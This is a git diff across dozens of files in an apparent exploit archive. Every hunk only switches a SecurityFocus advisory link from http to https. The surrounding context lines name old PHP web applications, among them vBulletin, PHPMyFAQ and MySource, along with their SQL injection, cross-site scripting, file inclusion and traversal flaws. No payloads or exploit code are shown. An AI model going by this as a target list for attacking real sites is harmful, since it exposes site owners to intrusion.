index 53b0d55dd..ad452d6f1 100644 --- a/exploits/php/webapps/26267.txt +++ b/exploits/php/webapps/26267.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14851/info +source: https://www.securityfocus.com/bid/14851/info DeluxeBB is prone to multiple SQL injection vulnerabilities. These are due to a lack of proper sanitization of user-supplied input before being sent to SQL queries. diff --git a/exploits/php/webapps/26268.txt b/exploits/php/webapps/26268.txt index 8212321bf..66fae2a0d 100644 --- a/exploits/php/webapps/26268.txt +++ b/exploits/php/webapps/26268.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14851/info +source: https://www.securityfocus.com/bid/14851/info DeluxeBB is prone to multiple SQL injection vulnerabilities. These are due to a lack of proper sanitization of user-supplied input before being sent to SQL queries. diff --git a/exploits/php/webapps/26270.txt b/exploits/php/webapps/26270.txt index e2ae01108..15f6abb3f 100644 --- a/exploits/php/webapps/26270.txt +++ b/exploits/php/webapps/26270.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14862/info +source: https://www.securityfocus.com/bid/14862/info Content2Web is affected by multiple input validation vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26272.txt b/exploits/php/webapps/26272.txt index b704724a9..f0b5ea845 100644 --- a/exploits/php/webapps/26272.txt +++ b/exploits/php/webapps/26272.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14871/info +source: https://www.securityfocus.com/bid/14871/info EPay Pro is prone to a directory traversal vulnerability. This is due to a lack of proper validation of user-supplied input. diff --git a/exploits/php/webapps/26273.txt b/exploits/php/webapps/26273.txt index 23592486e..aad08ccfa 100644 --- a/exploits/php/webapps/26273.txt +++ b/exploits/php/webapps/26273.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14872/info +source: https://www.securityfocus.com/bid/14872/info vBulletin is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/php/webapps/26274.txt b/exploits/php/webapps/26274.txt index c2c31b044..d472e6677 100644 --- a/exploits/php/webapps/26274.txt +++ b/exploits/php/webapps/26274.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14872/info +source: https://www.securityfocus.com/bid/14872/info vBulletin is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/php/webapps/26275.txt b/exploits/php/webapps/26275.txt index e70ce50c1..3b8c57a91 100644 --- a/exploits/php/webapps/26275.txt +++ b/exploits/php/webapps/26275.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14872/info +source: https://www.securityfocus.com/bid/14872/info vBulletin is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/php/webapps/26276.txt b/exploits/php/webapps/26276.txt index fb27236f1..da55afde7 100644 --- a/exploits/php/webapps/26276.txt +++ b/exploits/php/webapps/26276.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14872/info +source: https://www.securityfocus.com/bid/14872/info vBulletin is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/php/webapps/26277.txt b/exploits/php/webapps/26277.txt index b5dbe9747..f557e4090 100644 --- a/exploits/php/webapps/26277.txt +++ b/exploits/php/webapps/26277.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14873/info +source: https://www.securityfocus.com/bid/14873/info NooToplist is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26278.txt b/exploits/php/webapps/26278.txt index 8fffa59d7..14d710689 100644 --- a/exploits/php/webapps/26278.txt +++ b/exploits/php/webapps/26278.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14874/info +source: https://www.securityfocus.com/bid/14874/info vBulletin is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26279.txt b/exploits/php/webapps/26279.txt index 38e796035..128faae96 100644 --- a/exploits/php/webapps/26279.txt +++ b/exploits/php/webapps/26279.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14874/info +source: https://www.securityfocus.com/bid/14874/info vBulletin is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26280.txt b/exploits/php/webapps/26280.txt index 851b42f0f..53585ff78 100644 --- a/exploits/php/webapps/26280.txt +++ b/exploits/php/webapps/26280.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14874/info +source: https://www.securityfocus.com/bid/14874/info vBulletin is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26281.txt b/exploits/php/webapps/26281.txt index 906034fce..b73000222 100644 --- a/exploits/php/webapps/26281.txt +++ b/exploits/php/webapps/26281.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14874/info +source: https://www.securityfocus.com/bid/14874/info vBulletin is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26282.txt b/exploits/php/webapps/26282.txt index 3adbf0031..14c8e36df 100644 --- a/exploits/php/webapps/26282.txt +++ b/exploits/php/webapps/26282.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14874/info +source: https://www.securityfocus.com/bid/14874/info vBulletin is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26283.txt b/exploits/php/webapps/26283.txt index 83724e52e..3d061702a 100644 --- a/exploits/php/webapps/26283.txt +++ b/exploits/php/webapps/26283.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14874/info +source: https://www.securityfocus.com/bid/14874/info vBulletin is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26284.txt b/exploits/php/webapps/26284.txt index b8fa40318..d37892fd2 100644 --- a/exploits/php/webapps/26284.txt +++ b/exploits/php/webapps/26284.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14876/info +source: https://www.securityfocus.com/bid/14876/info MX Shop is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26285.txt b/exploits/php/webapps/26285.txt index bcabf7a59..f338306ab 100644 --- a/exploits/php/webapps/26285.txt +++ b/exploits/php/webapps/26285.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14879/info +source: https://www.securityfocus.com/bid/14879/info Hesk is prone to an authentication bypass vulnerability. diff --git a/exploits/php/webapps/26286.txt b/exploits/php/webapps/26286.txt index 9d539e9b7..f562fdddb 100644 --- a/exploits/php/webapps/26286.txt +++ b/exploits/php/webapps/26286.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14883/info +source: https://www.securityfocus.com/bid/14883/info PHP Advanced Transfer Manager is prone to multiple directory traversal vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26287.txt b/exploits/php/webapps/26287.txt index bd12fe177..b172601f0 100644 --- a/exploits/php/webapps/26287.txt +++ b/exploits/php/webapps/26287.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14887/info +source: https://www.securityfocus.com/bid/14887/info PHP Advanced Transfer Manager is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26293.txt b/exploits/php/webapps/26293.txt index a08c60768..6388c0517 100644 --- a/exploits/php/webapps/26293.txt +++ b/exploits/php/webapps/26293.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14926/info +source: https://www.securityfocus.com/bid/14926/info JPortal is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26294.txt b/exploits/php/webapps/26294.txt index 17fe36928..b93d67e61 100644 --- a/exploits/php/webapps/26294.txt +++ b/exploits/php/webapps/26294.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14927/info +source: https://www.securityfocus.com/bid/14927/info phpMyFAQ is affected by an SQL injection vulnerability. This issue is due to the application failing to properly sanitize user-supplied input before using it in a SQL query. diff --git a/exploits/php/webapps/26295.txt b/exploits/php/webapps/26295.txt index a0207e593..5fd5ffff1 100644 --- a/exploits/php/webapps/26295.txt +++ b/exploits/php/webapps/26295.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14928/info +source: https://www.securityfocus.com/bid/14928/info PHPMyFAQ is prone to multiple cross-site scripting vulnerabilities. diff --git a/exploits/php/webapps/26296.txt b/exploits/php/webapps/26296.txt index b8d2919e4..ab86ae379 100644 --- a/exploits/php/webapps/26296.txt +++ b/exploits/php/webapps/26296.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14929/info +source: https://www.securityfocus.com/bid/14929/info PHPMyFAQ is prone to a local file include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26297.txt b/exploits/php/webapps/26297.txt index 54b100e6c..da3233b33 100644 --- a/exploits/php/webapps/26297.txt +++ b/exploits/php/webapps/26297.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14930/info +source: https://www.securityfocus.com/bid/14930/info PHPMyFAQ is prone to an unauthorized access vulnerability. A remote attacker can exploit this vulnerability to view the application log file. diff --git a/exploits/php/webapps/26298.txt b/exploits/php/webapps/26298.txt index b59c1862f..c49489a5c 100644 --- a/exploits/php/webapps/26298.txt +++ b/exploits/php/webapps/26298.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14937/info +source: https://www.securityfocus.com/bid/14937/info CMS Made Simple is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26300.txt b/exploits/php/webapps/26300.txt index 5099afb1f..54b04ba85 100644 --- a/exploits/php/webapps/26300.txt +++ b/exploits/php/webapps/26300.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14951/info +source: https://www.securityfocus.com/bid/14951/info lucidCMS is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26302.txt b/exploits/php/webapps/26302.txt index 7bb171c27..5d0742ef1 100644 --- a/exploits/php/webapps/26302.txt +++ b/exploits/php/webapps/26302.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14960/info +source: https://www.securityfocus.com/bid/14960/info A remote command execution vulnerability affects the application. diff --git a/exploits/php/webapps/26303.txt b/exploits/php/webapps/26303.txt index 4369c6cd3..bc98fe1fe 100644 --- a/exploits/php/webapps/26303.txt +++ b/exploits/php/webapps/26303.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14962/info +source: https://www.securityfocus.com/bid/14962/info CubeCart is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26304.txt b/exploits/php/webapps/26304.txt index 635501c58..746ba6a2a 100644 --- a/exploits/php/webapps/26304.txt +++ b/exploits/php/webapps/26304.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14962/info +source: https://www.securityfocus.com/bid/14962/info CubeCart is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26305.txt b/exploits/php/webapps/26305.txt index 05c850f76..734aec7e5 100644 --- a/exploits/php/webapps/26305.txt +++ b/exploits/php/webapps/26305.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14973/info +source: https://www.securityfocus.com/bid/14973/info SquirrelMail Address Add Plugin is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26307.txt b/exploits/php/webapps/26307.txt index 49c079ebd..569507bc1 100644 --- a/exploits/php/webapps/26307.txt +++ b/exploits/php/webapps/26307.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14976/info +source: https://www.securityfocus.com/bid/14976/info lucidCMS is prone to to an SQL injection vulnerability. diff --git a/exploits/php/webapps/26308.txt b/exploits/php/webapps/26308.txt index 748dc16dd..e6d64ad9a 100644 --- a/exploits/php/webapps/26308.txt +++ b/exploits/php/webapps/26308.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14980/info +source: https://www.securityfocus.com/bid/14980/info IceWarp is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26309.txt b/exploits/php/webapps/26309.txt index df26b3852..814c16206 100644 --- a/exploits/php/webapps/26309.txt +++ b/exploits/php/webapps/26309.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14980/info +source: https://www.securityfocus.com/bid/14980/info IceWarp is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26310.txt b/exploits/php/webapps/26310.txt index 202753860..c93f90b01 100644 --- a/exploits/php/webapps/26310.txt +++ b/exploits/php/webapps/26310.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14980/info +source: https://www.securityfocus.com/bid/14980/info IceWarp is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26311.txt b/exploits/php/webapps/26311.txt index ba905d14f..c4ecf642a 100644 --- a/exploits/php/webapps/26311.txt +++ b/exploits/php/webapps/26311.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14980/info +source: https://www.securityfocus.com/bid/14980/info IceWarp is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26312.txt b/exploits/php/webapps/26312.txt index 94b5cdb37..5b99d6c3b 100644 --- a/exploits/php/webapps/26312.txt +++ b/exploits/php/webapps/26312.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14984/info +source: https://www.securityfocus.com/bid/14984/info EasyGuppy is prone to a directory traversal vulnerability. diff --git a/exploits/php/webapps/26313.txt b/exploits/php/webapps/26313.txt index 245790155..386f4ab40 100644 --- a/exploits/php/webapps/26313.txt +++ b/exploits/php/webapps/26313.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14988/info +source: https://www.securityfocus.com/bid/14988/info Merak Mail Server is affected by an arbitrary file deletion vulnerability. This issue arises due to an input validation error allowing an attacker to delete files in the context of the Web server running the application. diff --git a/exploits/php/webapps/26324.txt b/exploits/php/webapps/26324.txt index 0ccf79327..679e7f8a4 100644 --- a/exploits/php/webapps/26324.txt +++ b/exploits/php/webapps/26324.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15012/info +source: https://www.securityfocus.com/bid/15012/info TellMe is prone to multiple cross-site scripting vulnerabilities. This is due to a lack of proper sanitization of user-supplied input. diff --git a/exploits/php/webapps/26327.txt b/exploits/php/webapps/26327.txt index 595019618..ffac0e143 100644 --- a/exploits/php/webapps/26327.txt +++ b/exploits/php/webapps/26327.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15027/info +source: https://www.securityfocus.com/bid/15027/info Utopia News Pro is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26328.txt b/exploits/php/webapps/26328.txt index 8df5cf4b9..2ba711143 100644 --- a/exploits/php/webapps/26328.txt +++ b/exploits/php/webapps/26328.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15027/info +source: https://www.securityfocus.com/bid/15027/info Utopia News Pro is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26337.php b/exploits/php/webapps/26337.php index d9adb0033..0b51302a1 100644 --- a/exploits/php/webapps/26337.php +++ b/exploits/php/webapps/26337.php @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15047/info +source: https://www.securityfocus.com/bid/15047/info Cyphor is prone to multiple cross-site scripting and SQL injection vulnerabilities. diff --git a/exploits/php/webapps/26338.txt b/exploits/php/webapps/26338.txt index 453fd9f0d..65a85ab11 100644 --- a/exploits/php/webapps/26338.txt +++ b/exploits/php/webapps/26338.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15047/info +source: https://www.securityfocus.com/bid/15047/info Cyphor is prone to multiple cross-site scripting and SQL injection vulnerabilities. diff --git a/exploits/php/webapps/26339.txt b/exploits/php/webapps/26339.txt index e5de0cbc7..2ce68481d 100644 --- a/exploits/php/webapps/26339.txt +++ b/exploits/php/webapps/26339.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15047/info +source: https://www.securityfocus.com/bid/15047/info Cyphor is prone to multiple cross-site scripting and SQL injection vulnerabilities. diff --git a/exploits/php/webapps/26343.txt b/exploits/php/webapps/26343.txt index 78e73b290..5548adc5d 100644 --- a/exploits/php/webapps/26343.txt +++ b/exploits/php/webapps/26343.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15077/info +source: https://www.securityfocus.com/bid/15077/info Accelerated E Solutions is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26345.txt b/exploits/php/webapps/26345.txt index 05c4a1bef..e10d5959f 100644 --- a/exploits/php/webapps/26345.txt +++ b/exploits/php/webapps/26345.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15092/info +source: https://www.securityfocus.com/bid/15092/info Yapig is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26346.txt b/exploits/php/webapps/26346.txt index d88a920de..cbf69e33e 100644 --- a/exploits/php/webapps/26346.txt +++ b/exploits/php/webapps/26346.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15097/info +source: https://www.securityfocus.com/bid/15097/info Accelerated Mortgage Manager is prone to an SQL injection vulnerability. This is due to a lack of proper sanitization of user-supplied input before passing it on to SQL queries. diff --git a/exploits/php/webapps/26347.txt b/exploits/php/webapps/26347.txt index c761ecabe..2f3600f50 100644 --- a/exploits/php/webapps/26347.txt +++ b/exploits/php/webapps/26347.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15108/info +source: https://www.securityfocus.com/bid/15108/info Gallery is prone to a directory traversal vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26348.txt b/exploits/php/webapps/26348.txt index 3ae8bb992..1b397c9fa 100644 --- a/exploits/php/webapps/26348.txt +++ b/exploits/php/webapps/26348.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15111/info +source: https://www.securityfocus.com/bid/15111/info Complete PHP Counter is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26349.txt b/exploits/php/webapps/26349.txt index 04ac6b3ad..dc6b75035 100644 --- a/exploits/php/webapps/26349.txt +++ b/exploits/php/webapps/26349.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15112/info +source: https://www.securityfocus.com/bid/15112/info Complete PHP Counter is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26350.txt b/exploits/php/webapps/26350.txt index 38e824277..e0488a48f 100644 --- a/exploits/php/webapps/26350.txt +++ b/exploits/php/webapps/26350.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15114/info +source: https://www.securityfocus.com/bid/15114/info PunBB is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26355.txt b/exploits/php/webapps/26355.txt index 1f6848616..e47ccae38 100644 --- a/exploits/php/webapps/26355.txt +++ b/exploits/php/webapps/26355.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15132/info +source: https://www.securityfocus.com/bid/15132/info MySource is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26356.txt b/exploits/php/webapps/26356.txt index 61f91bcbd..35ef03147 100644 --- a/exploits/php/webapps/26356.txt +++ b/exploits/php/webapps/26356.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15132/info +source: https://www.securityfocus.com/bid/15132/info MySource is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26357.txt b/exploits/php/webapps/26357.txt index 8e9cb99db..073f17c17 100644 --- a/exploits/php/webapps/26357.txt +++ b/exploits/php/webapps/26357.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15132/info +source: https://www.securityfocus.com/bid/15132/info MySource is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26358.txt b/exploits/php/webapps/26358.txt index 57a1686b8..3f84e95d0 100644 --- a/exploits/php/webapps/26358.txt +++ b/exploits/php/webapps/26358.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15132/info +source: https://www.securityfocus.com/bid/15132/info MySource is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26359.txt b/exploits/php/webapps/26359.txt index 51157e4b8..a49184481 100644 --- a/exploits/php/webapps/26359.txt +++ b/exploits/php/webapps/26359.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15132/info +source: https://www.securityfocus.com/bid/15132/info MySource is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26360.txt b/exploits/php/webapps/26360.txt index 0b932408a..7d27f02b5 100644 --- a/exploits/php/webapps/26360.txt +++ b/exploits/php/webapps/26360.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15132/info +source: https://www.securityfocus.com/bid/15132/info MySource is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26361.txt b/exploits/php/webapps/26361.txt index 981e2384c..57cbf2f39 100644 --- a/exploits/php/webapps/26361.txt +++ b/exploits/php/webapps/26361.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15132/info +source: https://www.securityfocus.com/bid/15132/info MySource is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26362.txt b/exploits/php/webapps/26362.txt index f92fcbe60..0371d885d 100644 --- a/exploits/php/webapps/26362.txt +++ b/exploits/php/webapps/26362.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15133/info +source: https://www.securityfocus.com/bid/15133/info MySource is prone to multiple remote and local file include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26363.txt b/exploits/php/webapps/26363.txt index e7776db6c..e8abe2c51 100644 --- a/exploits/php/webapps/26363.txt +++ b/exploits/php/webapps/26363.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15133/info +source: https://www.securityfocus.com/bid/15133/info MySource is prone to multiple remote and local file include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26364.txt b/exploits/php/webapps/26364.txt index 2af569cb1..59b897dbe 100644 --- a/exploits/php/webapps/26364.txt +++ b/exploits/php/webapps/26364.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15133/info +source: https://www.securityfocus.com/bid/15133/info MySource is prone to multiple remote and local file include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26365.txt b/exploits/php/webapps/26365.txt index 674c11d28..469012e75 100644 --- a/exploits/php/webapps/26365.txt +++ b/exploits/php/webapps/26365.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15133/info +source: https://www.securityfocus.com/bid/15133/info MySource is prone to multiple remote and local file include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26369.txt b/exploits/php/webapps/26369.txt index 85e1a897e..044b2f800 100644 --- a/exploits/php/webapps/26369.txt +++ b/exploits/php/webapps/26369.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15133/info +source: https://www.securityfocus.com/bid/15133/info MySource is prone to multiple remote and local file include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26370.txt b/exploits/php/webapps/26370.txt index 0cadd8312..1bb3c7efc 100644 --- a/exploits/php/webapps/26370.txt +++ b/exploits/php/webapps/26370.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15133/info +source: https://www.securityfocus.com/bid/15133/info MySource is prone to multiple remote and local file include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26371.txt b/exploits/php/webapps/26371.txt index bbabff46d..f68cdfb01 100644 --- a/exploits/php/webapps/26371.txt +++ b/exploits/php/webapps/26371.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15133/info +source: https://www.securityfocus.com/bid/15133/info MySource is prone to multiple remote and local file include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26372.txt b/exploits/php/webapps/26372.txt index c793081cc..b803ee9e6 100644 --- a/exploits/php/webapps/26372.txt +++ b/exploits/php/webapps/26372.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15133/info +source: https://www.securityfocus.com/bid/15133/info MySource is prone to multiple remote and local file include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26373.txt b/exploits/php/webapps/26373.txt index b00f87b69..e26e4419a 100644 --- a/exploits/php/webapps/26373.txt +++ b/exploits/php/webapps/26373.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15133/info +source: https://www.securityfocus.com/bid/15133/info MySource is prone to multiple remote and local file include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26377.txt b/exploits/php/webapps/26377.txt index e745d0af6..afd2c06e0 100644 --- a/exploits/php/webapps/26377.txt +++ b/exploits/php/webapps/26377.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15137/info +source: https://www.securityfocus.com/bid/15137/info PHPNuke Search Module is prone to a directory traversal vulnerability. This is due to a lack of proper sanitization of user-supplied input. diff --git a/exploits/php/webapps/26378.txt b/exploits/php/webapps/26378.txt index 611e8e996..289b58d94 100644 --- a/exploits/php/webapps/26378.txt +++ b/exploits/php/webapps/26378.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15149/info +source: https://www.securityfocus.com/bid/15149/info Chipmunk products are prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the applications to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26379.txt b/exploits/php/webapps/26379.txt index de7d35925..045ff3059 100644 --- a/exploits/php/webapps/26379.txt +++ b/exploits/php/webapps/26379.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15149/info +source: https://www.securityfocus.com/bid/15149/info Chipmunk products are prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the applications to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26380.txt b/exploits/php/webapps/26380.txt index 7067bb3bb..e94c6cd56 100644 --- a/exploits/php/webapps/26380.txt +++ b/exploits/php/webapps/26380.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15149/info +source: https://www.securityfocus.com/bid/15149/info Chipmunk products are prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the applications to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26381.txt b/exploits/php/webapps/26381.txt index a5839041d..8663622bc 100644 --- a/exploits/php/webapps/26381.txt +++ b/exploits/php/webapps/26381.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15149/info +source: https://www.securityfocus.com/bid/15149/info Chipmunk products are prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the applications to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26383.txt b/exploits/php/webapps/26383.txt index a9b9cb716..3dd669de6 100644 --- a/exploits/php/webapps/26383.txt +++ b/exploits/php/webapps/26383.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15168/info +source: https://www.securityfocus.com/bid/15168/info Zomplog is prone to an HTML injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in dynamically generated content. diff --git a/exploits/php/webapps/26384.txt b/exploits/php/webapps/26384.txt index fb9545c1a..942457dfd 100644 --- a/exploits/php/webapps/26384.txt +++ b/exploits/php/webapps/26384.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15172/info +source: https://www.securityfocus.com/bid/15172/info FlatNuke is prone to multiple remote file include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git 